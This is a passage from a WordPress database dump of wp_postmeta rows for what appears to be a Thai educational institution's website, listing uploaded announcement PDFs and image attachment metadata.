(25881, 10485, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:280;s:4:\"file\";s:24:\"2019/12/Untitled-2-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-2-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Untitled-2-1-300x66.png\";s:5:\"width\";i:300;s:6:\"height\";i:66;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-2-1-768x168.png\";s:5:\"width\";i:768;s:6:\"height\";i:168;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Untitled-2-1-1024x224.png\";s:5:\"width\";i:1024;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"Untitled-2-1-400x88.png\";s:5:\"width\";i:400;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25882, 10489, '_wp_attached_file', '2019/12/Untitled-2-2.png');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(25883, 10489, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:280;s:4:\"file\";s:24:\"2019/12/Untitled-2-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Untitled-2-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"Untitled-2-2-300x66.png\";s:5:\"width\";i:300;s:6:\"height\";i:66;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Untitled-2-2-768x168.png\";s:5:\"width\";i:768;s:6:\"height\";i:168;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"Untitled-2-2-1024x224.png\";s:5:\"width\";i:1024;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"Untitled-2-2-400x88.png\";s:5:\"width\";i:400;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25884, 10492, '_edit_lock', '1598330119:14'),
(25885, 10492, '_edit_last', '14'),
(25886, 10493, '_wp_attached_file', '2020/08/เวรเดือนกันยายน-2563.pdf'),
(25887, 10492, '_hide_featured', NULL),
(25896, 10498, '_edit_lock', '1598943488:14'),
(25897, 10499, '_wp_attached_file', '2020/08/ประกาศพ้นสภาพขาดพื้นความรู้1-63.pdf'),
(25898, 10498, '_edit_last', '14'),
(25901, 10498, '_hide_featured', NULL),
(25904, 10501, '_wp_attached_file', '2019/12/พ้นสภาพ.png'),
(25905, 10501, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:250;s:4:\"file\";s:33:\"2019/12/พ้นสภาพ.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"พ้นสภาพ-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"พ้นสภาพ-300x59.png\";s:5:\"width\";i:300;s:6:\"height\";i:59;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"พ้นสภาพ-768x150.png\";s:5:\"width\";i:768;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"พ้นสภาพ-1024x200.png\";s:5:\"width\";i:1024;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"พ้นสภาพ-400x78.png\";s:5:\"width\";i:400;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25906, 10504, '_wp_attached_file', '2019/12/พ้นสภาพ-1.png'),
(25907, 10504, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:250;s:4:\"file\";s:35:\"2019/12/พ้นสภาพ-1.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"พ้นสภาพ-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"พ้นสภาพ-1-300x59.png\";s:5:\"width\";i:300;s:6:\"height\";i:59;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"พ้นสภาพ-1-768x150.png\";s:5:\"width\";i:768;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"พ้นสภาพ-1-1024x200.png\";s:5:\"width\";i:1024;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:34:\"พ้นสภาพ-1-400x78.png\";s:5:\"width\";i:400;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25908, 10507, '_wp_attached_file', '2020/08/เวรเดือนกันยายน-2563-1.pdf'),
(25913, 10511, '_edit_lock', '1600817779:14'),
(25914, 10511, '_edit_last', '14'),
(25915, 10512, '_wp_attached_file', '2020/08/ประกาศรับสมัครครูพลและครูสอนภาษาจีน.pdf'),
(25918, 10511, '_hide_featured', NULL),
(25921, 10514, '_edit_lock', '1598605053:14'),
(25922, 10514, '_edit_last', '14'),
(25923, 10515, '_wp_attached_file', '2020/08/20200828115645678.pdf'),
(25926, 10514, '_hide_featured', NULL),
(25929, 10518, '_wp_attached_file', '2020/08/ประกาศพ้นสภาพขาดคุณสมบัติและพื้นความรู้63.pdf'),
(25936, 10521, '_edit_lock', '1599034672:14'),
(25937, 10521, '_edit_last', '14'),
(25938, 10522, '_wp_attached_file', '2020/09/ประกาศรายชื่อผู้มีสิทธิสอบ.pdf'),
(25941, 10521, '_hide_featured', NULL),
(25945, 10526, '_edit_lock', '1599097933:14'),
(25946, 10526, '_edit_last', '14'),
(25947, 10527, '_wp_attached_file', '2020/09/ประกาศรายชื่อครูวิทยาศาสตร์.pdf'),
(25950, 10526, '_hide_featured', NULL),
(25953, 10530, '_edit_lock', '1600136770:14'),
(25954, 10530, '_edit_last', '14'),
(25955, 10530, '_hide_featured', NULL),
(25956, 10532, '_wp_attached_file', '2020/09/ประกาศรายชื่อผู้มีสิทธิสอบครูจ้าง.pdf'),
(25963, 10534, '_edit_lock', '1600328781:14'),
(25964, 10534, '_edit_last', '14'),
(25965, 10535, '_wp_attached_file', '2020/09/ประกาศรายชื่อครูพลศึกษาและครูสอนภาษาจีน.pdf'),
(25968, 10534, '_hide_featured', NULL),
(25970, 10539, '_edit_lock', '1600824448:14'),
(25971, 10539, '_edit_last', '14'),
(25972, 10541, '_wp_attached_file', '2020/09/รับสมัครครูชฟ.63.pdf'),
(25975, 10539, '_hide_featured', NULL),
(25978, 10544, '_edit_lock', '1601605388:14'),
(25979, 10544, '_edit_last', '14'),
(25980, 10545, '_wp_attached_file', '2020/10/021063.pdf'),
(25983, 10544, '_hide_featured', NULL),
(25989, 10548, '_edit_lock', '1601864092:14'),
(25990, 10548, '_edit_last', '14'),
(25991, 10549, '_wp_attached_file', '2020/10/021063-34.jpg'),
(25992, 10549, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-34.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-34-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-34-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-34-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-34-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-34-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25993, 10550, '_wp_attached_file', '2020/10/021063-33.jpg'),
(25994, 10550, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-33.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-33-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-33-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-33-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-33-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-33-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25995, 10551, '_wp_attached_file', '2020/10/021063-32.jpg'),
(25996, 10551, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-32.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-32-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-32-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-32-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-32-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-32-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25997, 10552, '_wp_attached_file', '2020/10/021063-31.jpg'),
(25998, 10552, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-31.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-31-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-31-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-31-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-31-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-31-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25999, 10553, '_wp_attached_file', '2020/10/021063-30.jpg'),
(26000, 10553, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-30.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-30-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-30-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-30-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-30-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-30-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26001, 10554, '_wp_attached_file', '2020/10/021063-29.jpg'),
(26002, 10554, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-29.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-29-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-29-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-29-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-29-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-29-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26003, 10555, '_wp_attached_file', '2020/10/021063-28.jpg'),
(26004, 10555, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-28.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-28-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-28-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-28-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-28-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-28-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26005, 10556, '_wp_attached_file', '2020/10/021063-27.jpg'),
(26006, 10556, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-27.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-27-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-27-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-27-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-27-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-27-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26007, 10557, '_wp_attached_file', '2020/10/021063-25.jpg'),
(26008, 10557, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-25.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-25-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-25-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-25-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-25-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-25-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26009, 10558, '_wp_attached_file', '2020/10/021063-24.jpg'),
(26010, 10558, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-24.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-24-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-24-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-24-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-24-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-24-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26011, 10559, '_wp_attached_file', '2020/10/021063-23.jpg'),
(26012, 10559, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-23.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-23-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-23-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-23-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-23-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-23-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26013, 10560, '_wp_attached_file', '2020/10/021063-21.jpg'),
